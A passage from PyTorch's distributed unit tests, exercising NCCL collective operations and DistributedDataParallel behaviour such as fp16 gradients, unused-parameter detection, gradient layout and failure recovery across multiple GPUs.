pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allgather_base(output_t, input_t):
work = pg._allgather_base(output_t, input_t)
work.wait()
device_id = self.rank % self.num_gpus
# anticpate an error
with self.assertRaisesRegex(
RuntimeError,
"output tensor size must be equal to world_size times input tensor size",
):
tensor = torch.tensor([self.rank]).cuda(device_id)
output_t = torch.empty((self.world_size + 1), dtype=tensor.dtype).cuda(
device_id
)
# fails the check because output_t is not correctly sized
allgather_base(output_t, tensor)
# anticpate an error
with self.assertRaisesRegex(
RuntimeError, "output tensor must have the same type as input tensor"
):
tensor = torch.tensor([self.rank], dtype=torch.float).cuda(device_id)
output_t = torch.empty((self.world_size + 1), dtype=torch.long).cuda(
device_id
)
# fails the check because the dtype is different
allgather_base(output_t, tensor)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_reduce_scatter_base_basics(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce_scatter_base(output_t, input_t):
work = pg._reduce_scatter_base(output_t, input_t)
work.wait()
device_id = self.rank % self.num_gpus
# anticpate an error
with self.assertRaisesRegex(
RuntimeError,
"input tensor must be the same size as output size times world size",
):
input_t = torch.tensor([self.rank]).cuda(device_id)
output_t = torch.empty((self.world_size + 1), dtype=input_t.dtype).cuda(
device_id
)
# fails the check because output_t is not correctly sized
reduce_scatter_base(output_t, input_t)
# anticpate an error
with self.assertRaisesRegex(
RuntimeError, "input tensor must be the same type as the outut tensor."
):
tensor = torch.tensor([self.rank], dtype=torch.float).cuda(device_id)
output_t = torch.empty((self.world_size + 1), dtype=torch.long).cuda(
device_id
)
# fails the check because the dtype is different
reduce_scatter_base(output_t, tensor)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_reduce_scatter_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce_scatter(outputs, input_lists, op):
opts = c10d.ReduceScatterOptions()
opts.reduceOp = op
work = pg.reduce_scatter(outputs, input_lists, opts)
work.wait()
virtual_rank = self.rank * self.world_size
virtual_world_size = self.num_gpus * self.world_size
output = [torch.tensor([0]).cuda(i) for i in range(self.num_gpus)]
# 0 1 2
# 0 [0..11] [1..12]
# 1 [3..14]
# 2
# 3
# Sum
tensor_lists = [
[
torch.tensor([self.rank * self.num_gpus + i + j]).cuda(i)
for j in range(virtual_world_size)
]
for i in range(self.num_gpus)
]
reduce_scatter(output, tensor_lists, c10d.ReduceOp.SUM)
for i in range(self.num_gpus):
expected = torch.tensor(
[
float(self.num_gpus * (self.num_gpus - 1) / 2)
+ (virtual_rank + i) * virtual_world_size
]
)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(expected, output[i])
# Min
reduce_scatter(output, tensor_lists, c10d.ReduceOp.MIN)
for i in range(self.num_gpus):
expected = torch.tensor([self.rank * self.world_size + i])
self.assertEqual(expected, output[i])
# Max
reduce_scatter(output, tensor_lists, c10d.ReduceOp.MAX)
for i in range(self.num_gpus):
expected = torch.tensor(
[self.rank * self.world_size + i + virtual_world_size - 1]
)
self.assertEqual(expected, output[i])
# Product
tensor_lists = [
[
torch.tensor(
[(self.rank * self.num_gpus + i + j) % virtual_world_size + 1]
).cuda(i)
for j in range(virtual_world_size)
]
for i in range(self.num_gpus)
]
reduce_scatter(output, tensor_lists, c10d.ReduceOp.PRODUCT)
for i in range(self.num_gpus):
expected = torch.tensor([float(math.factorial(virtual_world_size))])
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(expected, output[i])
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_reduce_scatter_base_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce_scatter_base(output_t, input_t):
work = pg._reduce_scatter_base(output_t, input_t)
work.wait()
device_id = self.rank % self.num_gpus
# reduce_scatter_base is GPU number agnostic.
# Each rank contribute one tensor regardless of GPU counts
output_t = torch.empty([1]).cuda(device_id)
tensor = torch.arange(self.world_size, dtype=output_t.dtype).cuda(device_id)
reduce_scatter_base(output_t, tensor)
# Verification
self.assertEqual(output_t[0], self.rank * self.world_size)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_barrier(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce(tensors):
opts = c10d.AllreduceOptions()
work = pg.allreduce(tensors, opts)
return work
# Making the collective to operate on
# 1, 2, 3, 4, .... self.num_gpus GPUs
tensors_list = [[] for _ in range(2, self.num_gpus + 1)]
for i in range(2, self.num_gpus + 1):
for j in range(i):
tensors_list[i - 2].append(torch.tensor([j + 1]).cuda(j))
works = []
for tensors in tensors_list:
work = allreduce(tensors)
works.append(work)
# Barrier will ensure that all previous work is completed
pg.barrier().wait()
for i in range(2, self.num_gpus + 1):
for j in range(i):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(i * (i + 1) / 2)]), tensors_list[i - 2][j]
)
class DistributedDataParallelTest(
test_c10d_common.AbstractDistributedDataParallelTest, MultiProcessTestCase
):
def setUp(self):
super(DistributedDataParallelTest, self).setUp()
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
self._spawn_processes()
def _test_nccl_backend(
self, devices, device_ids, multi_device=False, gradient_as_bucket_view=False
):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
self._test_ddp_with_process_group(
process_group, devices, device_ids, multi_device, gradient_as_bucket_view
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_multi_device_ids_not_allowed(self):
int_devices = list(range(torch.cuda.device_count()))
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
with self.assertRaisesRegex(
ValueError, "device_ids can only be None or contain a single element."
):
self._test_nccl_backend(devices, int_devices)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_single_device_module_device_ids_None(self):
self._test_nccl_backend(None, None)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_single_device_module_empty_device_ids(self):
# This tests the backward compatibility of accepting an empty list as `device_ids`,
# although we no longer document this in favor of the default value of `None`,
# which is consistent with multi-device modules and CPU modules.
self._test_nccl_backend(None, [])
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_backend_multi_device_module_device_ids_None(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_1gpu_module_device_ids_integer_list(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, int_devices)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_1gpu_module_device_ids_torch_device_list(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, devices)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_backend_2gpu_module(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
@requires_nccl()
@skip_if_lt_x_gpu(8)
def test_nccl_backend_4gpu_module(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:4]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_ddp_multi_device_module_config(self):
gpus = gpus_for_rank(self.world_size)[self.rank]
self.assertTrue(len(gpus) >= 2, "expecting at least 2 gpus per process")
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
gpus = gpus[:2]
model = DoubleGpuNet(gpus)
with self.assertRaisesRegex(
ValueError,
"DistributedDataParallel device_ids and output_device arguments only work with "
"single-device/multiple-device GPU modules or CPU modules",
):
ddp_model = DistributedDataParallel(
model, output_device=gpus[1], process_group=process_group
)
with self.assertRaisesRegex(
ValueError, "device_ids can only be None or contain a single element."
):
ddp_model = DistributedDataParallel(
model, device_ids=gpus, process_group=process_group
)
with self.assertRaisesRegex(
ValueError, "input module must be on the same type of devices"
):
model.fc1 = model.fc1.cpu()
ddp_model = DistributedDataParallel(model, process_group=process_group)
model = model.cpu()
with self.assertRaisesRegex(
ValueError, "device_ids can only be None or contain a single element."
):
ddp_model = DistributedDataParallel(
model, device_ids=gpus, process_group=process_group
)
def _test_fp16(self, gradient_as_bucket_view=False):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
gpus = gpus_for_rank(self.world_size)[self.rank]
model = nn.Linear(1, 1, bias=False).cuda(gpus[0]).half()
nn.init.constant_(model.weight, 1)
ddp_model = DistributedDataParallel(
model,
device_ids=[gpus[0]],
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Input 2**15, so that the gradients will overflow with a
# world_size of 2, unless we normalize the gradient by the
# world_size before the reduction
input = torch.tensor([[2 ** 15]]).cuda(gpus[0]).half()
# Step model
ddp_model.train()
output = ddp_model(input)
loss = output.sum()
loss.backward()
self.assertFalse(any(torch.isinf(p.grad).any() for p in ddp_model.parameters()))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16(self):
self._test_fp16()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16_grad_is_view(self):
self._test_fp16(gradient_as_bucket_view=True)
def _test_arbitrary_forward_return_value(self, gradient_as_bucket_view=False):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class ForwardReturnValueModule(nn.Module):
def __init__(self):
super(ForwardReturnValueModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.fc3 = nn.Linear(4, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x, fn):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
# The first softmax does NOT include fc3 in its autograd graph
# whereas the second softmax DOES. If we pass only the first
# tensor we see in the output to the reducer, it marks the
# gradient for fc3 as ready (because it doesn't show up). If
# downstream uses of this return value choose to differentiate
# against the second output tensor, it would still receive a
# gradient and a callback for this tensor, resulting in a crash.
return fn(
F.softmax(x, dim=1),
F.softmax(self.fc3(x), dim=1),
)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = DistributedDataParallel(
ForwardReturnValueModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
# Always run "backward" to ensure the reducer is called by autograd.
# If we don't correctly capture the output tensors from the return value,
# the reducer won't see a hook for the unused parameter, and throw an error.
# The correct capture is what we're testing in this function.
def test(box, unbox):
output = model(input, fn=box)
loss = criterion(unbox(output), target)
loss.backward()
# Test with identity return value
test(
box=lambda x, y: (x, y),
unbox=lambda obj: obj[1],
)
# Test with list return value
test(
box=lambda x, y: ["foo", x, "bar", y],
unbox=lambda obj: obj[3],
)
# Test with tuple return value
test(
box=lambda x, y: ("foo", x, "bar", y),
unbox=lambda obj: obj[3],
)
# Test with dict return value
test(
box=lambda x, y: {"foo": "bar", "a": x, "b": y},
unbox=lambda obj: obj["b"],
)
# Test with list with dict return value
test(
box=lambda x, y: ["foo", "bar", {"a": x, "b": y}],
unbox=lambda obj: obj[2]["b"],
)
# Test with dict with list return value
test(
box=lambda x, y: {"foo": "bar", "list": [0, x, 1, y]},
unbox=lambda obj: obj["list"][3],
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_arbitrary_forward_return_value(self):
self._test_arbitrary_forward_return_value()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_arbitrary_forward_return_value_grad_is_view(self):
self._test_arbitrary_forward_return_value(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_with_lazy_parameters(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
with self.assertRaisesRegex(
RuntimeError, "Modules with uninitialized parameters"
):
DistributedDataParallel(
torch.nn.LazyLinear(10), process_group=process_group
)
def _test_find_unused_parameters_kwarg(self, gradient_as_bucket_view=False):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
torch.cuda.set_device(self.rank)
dist.init_process_group(
backend="nccl",
world_size=self.world_size,
rank=self.rank,
init_method=f"file://{self.file_name}",
)
process_group = c10d.distributed_c10d._get_default_group()
class FindUnusedParametersModule(nn.Module):
def __init__(self):
super(FindUnusedParametersModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.fc3 = nn.Linear(4, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
# Return the fc3 module so that the caller can invoke it
# outside of the forward function. While this is bad practice,
# we can use it to trigger a reducer error.
return (F.softmax(x, dim=1), self.fc3)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
ddp_model = None
def test_find_unused_parameters(
find_unused_parameters, test_default=False, gradient_as_bucket_view=False
):
if test_default:
model = DistributedDataParallel(
FindUnusedParametersModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
else:
model = DistributedDataParallel(
FindUnusedParametersModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
find_unused_parameters=find_unused_parameters,
gradient_as_bucket_view=gradient_as_bucket_view,
)
nonlocal ddp_model
ddp_model = model
output, fc3 = model(input)
output = fc3(output)
loss = criterion(output, target)
loss.backward()
# First test that finding unused params under these conditions is to
# trigger an error when `backward` is called (because fc3 is an unused
# parameter and will therefore be marked ready twice).
try:
test_find_unused_parameters(
True, gradient_as_bucket_view=gradient_as_bucket_view
)
except Exception as ex:
self.assertTrue(
str(ex).startswith(
"Expected to mark a variable ready only once.",
)
)
unused_index = 2
unused_index_str = f"Parameter at index {unused_index}"
model = ddp_model.module
for module_name, module in model.named_modules():
if module == model.fc3:
for parameter_name, _ in module.named_parameters(recurse=False):
unused_fqn = f"{module_name}.{parameter_name}"
# Only one such parameter in model.fc3, since bias=False
break
if dist._get_debug_mode() != dist._DistributedDebugLevel.OFF:
unused_index_str += f" with name {unused_fqn}"
self.assertTrue(unused_index_str in str(ex))
else:
self.fail("Expected exception")
dist.barrier(process_group)
# Then test that the default behavior can be overridden by setting
# `find_unused_parameters=False`.
try:
test_find_unused_parameters(
False, gradient_as_bucket_view=gradient_as_bucket_view
)
except Exception as ex:
self.fail("Unexpected exception: %s" % ex)
# Test find_unused_parameters defaults to False
try:
test_find_unused_parameters(
True, test_default=True, gradient_as_bucket_view=gradient_as_bucket_view
)
except Exception as ex:
self.fail("Unexpected exception: %s" % ex)
# TODO: Combine the following tests once https://github.com/pytorch/pytorch/issues/55967
# is resolved.
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["DETAIL"])
def test_find_unused_parameters_kwarg_debug_detail(self):
self._test_find_unused_parameters_kwarg()
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["INFO"])
def test_find_unused_parameters_kwarg_debug_info(self):
self._test_find_unused_parameters_kwarg()
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["OFF"])
def test_find_unused_parameters_kwarg_debug_off(self):
self._test_find_unused_parameters_kwarg()
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["DETAIL"])
def test_find_unused_parameters_kwarg_grad_is_view_debug_detail(self):
self._test_find_unused_parameters_kwarg(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["INFO"])
def test_find_unused_parameters_kwarg_grad_is_view_debug_info(self):
self._test_find_unused_parameters_kwarg(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["OFF"])
def test_find_unused_parameters_kwarg_grad_is_view_debug_off(self):
self._test_find_unused_parameters_kwarg(gradient_as_bucket_view=True)
def _test_multiple_outputs_multiple_backward(self, gradient_as_bucket_view=False):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class MultipleOutputModule(nn.Module):
def __init__(self):
super(MultipleOutputModule, self).__init__()
def define_module():
return nn.Sequential(
nn.Linear(2, 10, bias=False),
nn.ReLU(),
nn.Linear(10, 4, bias=False),
nn.ReLU(),
)
self.module0 = define_module()
self.module1 = define_module()
def forward(self, x):
return (
F.softmax(self.module0(x), dim=1),
F.softmax(self.module1(x), dim=1),
)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = DistributedDataParallel(
MultipleOutputModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
# Compute loss and gradients for both outputs
output1, output2 = model(input)
loss1 = criterion(output1, target)
loss1.backward()
loss2 = criterion(output2, target)
loss2.backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_multiple_outputs_multiple_backward(self):
self._test_multiple_outputs_multiple_backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_multiple_outputs_multiple_backward_grad_is_view(self):
self._test_multiple_outputs_multiple_backward(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_no_grad(self):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class NoGradModule(nn.Module):
def __init__(self):
super(NoGradModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
return F.softmax(x, dim=1)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = DistributedDataParallel(
NoGradModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
)
batch_size = 4
input = torch.rand([batch_size, 2], dtype=torch.float)
def check_no_grads():
for p in model.parameters():
self.assertTrue(p.requires_grad)
self.assertIsNone(p.grad)
# After initialization, no parameter has their gradient set.
check_no_grads()
# Run `forward` function with torch.no_grad()
with torch.no_grad():
output = model(input)
self.assertTrue(isinstance(output, torch.Tensor))
# No parameter should have their gradient set.
check_no_grads()
def _test_accumulate_gradients_module(self, gradient_as_bucket_view=False):
# This is NOT the recommended way to implement accumulating grads, but
# we would like to make sure DDP does not mess up with the underlying
# module.
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
global_batch_size = self.world_size
model, ddp_model, input, target = self._prepare_single_device_module(
process_group, devices, devices, global_batch_size, gradient_as_bucket_view
)
def step_model(model, input, target):
model.train()
output = model(input)
loss = F.mse_loss(output, target.to(output.device))
loss.backward()
# ensure accumulate grads works with no_grad
with torch.no_grad():
ddp_model.train()
ddp_model.module(input)
# Check two model parameters over 4 iterations.
# Use 4 iterations because we alternate between reducing and
# not reducing and want to make sure we switch both ways.
for iteration in range(4):
step_model(model, input, target)
if iteration % 2 == 0:
# Skip gradients sync without calling prepare_for_backward
step_model(
ddp_model.module,
input[self.rank : (self.rank + 1)],
target[self.rank : (self.rank + 1)],
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
self.assertNotEqual(i.grad, j.grad)
else:
step_model(
ddp_model,
input[self.rank : (self.rank + 1)],
target[self.rank : (self.rank + 1)],
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(i.grad, j.grad, rtol=1.3e-06, atol=5e-5)
# Shuffle the input so that DDP input is different
torch.manual_seed(1337 + iteration)
input = input[torch.randperm(global_batch_size)]
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_module(self):
self._test_accumulate_gradients_module()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_module_with_grad_is_view(self):
self._test_accumulate_gradients_module(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_failure_recovery(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# need to create a separate file for the recovered FileStore, because
# the original one will be deleted when destructing the first FileStore.
recovery_filename = self.file_name + "_recovery"
if self.rank == 0:
# the file will be deleted by the recovered FileStore
open(recovery_filename, "w").close()
# not necessary to run barrier here, as DDP will synchronize
class TestModel(nn.Module):
def __init__(self):
super(TestModel, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
return F.softmax(x, dim=1)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = TestModel().float().to(device_id)
ddp = DistributedDataParallel(
model,
device_ids=[device_id],
process_group=process_group,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
for _ in range(6):
output = ddp(input)
loss = criterion(output, target)
loss.backward()
del ddp
del process_group
del store # this will delete self.file_name
store = c10d.FileStore(recovery_filename, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
ddp = DistributedDataParallel(
model,
device_ids=[device_id],
process_group=process_group,
)
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
for _ in range(6):
output = ddp(input)
loss = criterion(output, target)
loss.backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_pass_default_pg(self):
dist.init_process_group(
"nccl",
init_method=f"file://{self.file_name}",
world_size=self.world_size,
rank=self.rank,
)
default_pg = c10d.distributed_c10d._get_default_group()
dist.destroy_process_group(default_pg)
self.assertFalse(dist.is_initialized())
def _test_grad_layout(self, replica_devices, layer_devs, local_batch_size):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
global_batch_size = local_batch_size * self.world_size
# Carry out some trials with small buckets and some with big buckets.
bucketsizes = (0.000001, 25)
# Tuples of lists. Each list describes per-layer characteristics for one trial.
layer_formats = (
[torch.contiguous_format] * 4,
[torch.channels_last] * 2 + [torch.contiguous_format] * 2,
[torch.channels_last] * 4,
)
layer_dtypes = (
[torch.float] * 4,
[torch.float] * 2 + [torch.half] * 2,
[torch.half] * 4,
)
input_dev = layer_devs[0] if isinstance(layer_devs, list) else layer_devs
target_dev = layer_devs[-1] if isinstance(layer_devs, list) else layer_devs
input = torch.randn(
(global_batch_size, 8, 8, 8), device=input_dev, dtype=torch.float
)
target = torch.randn(
(global_batch_size, 8, 4, 4), device=target_dev, dtype=torch.float
)
local_batch_start = self.rank * local_batch_size
local_batch_end = (self.rank + 1) * local_batch_size
# Reducer.cpp sneakily creates one "initial bucket" that ignores the "bucket_cap_mb"
# argument. The following makes sure the initial bucket also complies.
@contextmanager
def first_bucket_size(ddp_bucket_mb):
old_DEFAULT_FIRST_BUCKET_BYTES = dist._DEFAULT_FIRST_BUCKET_BYTES
dist._DEFAULT_FIRST_BUCKET_BYTES = int(ddp_bucket_mb * 1.0e6)
try:
yield
finally:
dist._DEFAULT_FIRST_BUCKET_BYTES = old_DEFAULT_FIRST_BUCKET_BYTES
with torch.backends.cudnn.flags(
enabled=True, deterministic=True, benchmark=False
):
for formats, dtypes, bucketsize in product(
layer_formats, layer_dtypes, bucketsizes
):
with first_bucket_size(bucketsize):
model_msg = (
"rank = {} formats = {} dtypes = {} bucketsize = {} ".format(
self.rank, formats, dtypes, bucketsize
)
)
try:
m = ConvNet(layer_devs, formats, dtypes)
m_ddp = DistributedDataParallel(
copy.deepcopy(m),
device_ids=replica_devices,
process_group=process_group,
bucket_cap_mb=bucketsize,
)
opt = torch.optim.SGD(m.parameters(), lr=0.1)
opt_ddp = torch.optim.SGD(m_ddp.parameters(), lr=0.1)
has_half = any(p.dtype is torch.half for p in m.parameters())
tol = 1.0e-3 if has_half else 1.0e-5
except BaseException:
# Prints case-specific debugging info to narrow down failing case.
print(
"Caught exception during model creation for " + model_msg,
flush=True,
)
raise
# 3 iters: First iter creates grads, second iter retests after rebucketing,
# third iter tries zeroed grads.
for it in range(3):
iter_msg = "iter = {} ".format(it) + model_msg
named_msg = iter_msg
try:
F.mse_loss(m(input).float(), target).backward()
F.mse_loss(
m_ddp(input[local_batch_start:local_batch_end]).float(),
target[local_batch_start:local_batch_end],
).backward()
for i, ((layer_name, m_child), m_ddp_child) in enumerate(
zip(m.named_children(), m_ddp.module.children())
):
named_msg = layer_name + ".weight" + " " + iter_msg
self.assertTrue(
m_child.weight.grad.is_contiguous(
memory_format=formats[i]
),
named_msg,
)
self.assertTrue(
m_ddp_child.weight.grad.is_contiguous(
memory_format=formats[i]
),
named_msg,
)
for j, ((param_name, p), p_ddp) in enumerate(
zip(
m_child.named_parameters(),
m_ddp_child.parameters(),
)
):
named_msg = (
layer_name + "." + param_name + " " + iter_msg
)
self.assertEqual(
p.grad, p_ddp.grad, rtol=tol, atol=tol
)
opt.step()
opt_ddp.step()
if it == 0:
for p, p_ddp in zip(m.parameters(), m_ddp.parameters()):
p.grad = None
p_ddp.grad = None
else:
m.zero_grad()
m_ddp.zero_grad()
except BaseException:
# Makes sure we still get info if an error occurred somewhere other than the asserts.
print(
"Caught exception during iterations at " + named_msg,
flush=True,
)
raise
@requires_nccl()
@skip_if_lt_x_gpu(2)
@skip_if_rocm
def test_grad_layout_1devicemodule_1replicaperprocess(self):
dev0 = torch.device("cuda:" + str(gpus_for_rank(self.world_size)[self.rank][0]))
# Tells DDP to use just one device.
replica_devices = [dev0]
# Tells _test_grad_layout to construct ConvNet with all layers on this process's first assigned device.
layer_devs = dev0
local_batch_size = 8
self._test_grad_layout(replica_devices, layer_devs, local_batch_size)
@requires_nccl()
@skip_if_lt_x_gpu(4)
@skip_if_rocm
def test_grad_layout_2devicemodule(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
dev0 = torch.device("cuda:" + str(int_devices[0]))
dev1 = torch.device("cuda:" + str(int_devices[1]))
# DDP's default behavior for a multi-device module is "don't replicate."
replica_devices = None
# Tells _test_grad_layout to constructs this process's ConvNet on 2 devices, with 2 layers on each device.
layer_devs = [dev0] * 2 + [dev1] * 2
local_batch_size = 8
self._test_grad_layout(replica_devices, layer_devs, local_batch_size)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_param_layout_mismatch_error(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
dev0 = torch.device("cuda:" + str(gpus_for_rank(self.world_size)[self.rank][0]))
layer_devs = dev0
layer_formats = (
[torch.contiguous_format] * 4
if self.rank == 0
else [torch.channels_last] * 4
)
layer_dtypes = [torch.float] * 4
m = ConvNet(layer_devs, layer_formats, layer_dtypes)
if self.rank == 0:
m_ddp = DistributedDataParallel(
m, device_ids=[dev0], process_group=process_group
)
else:
with self.assertRaisesRegex(
RuntimeError,
".* appears not to match strides of the same param in process 0",
):
m_ddp = DistributedDataParallel(
m, device_ids=[dev0], process_group=process_group
)
def _gpu_model_with_ddp_comm_hook(
self,
process_group,
hook=None,
gradient_as_bucket_view=False,
state=None,
static_graph=False,
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
if static_graph:
gpu_model._set_static_graph()
# Register a DDP communication hook if any.
if hook is not None:
gpu_model.register_comm_hook(state, hook)
return gpu_model
@requires_nccl()
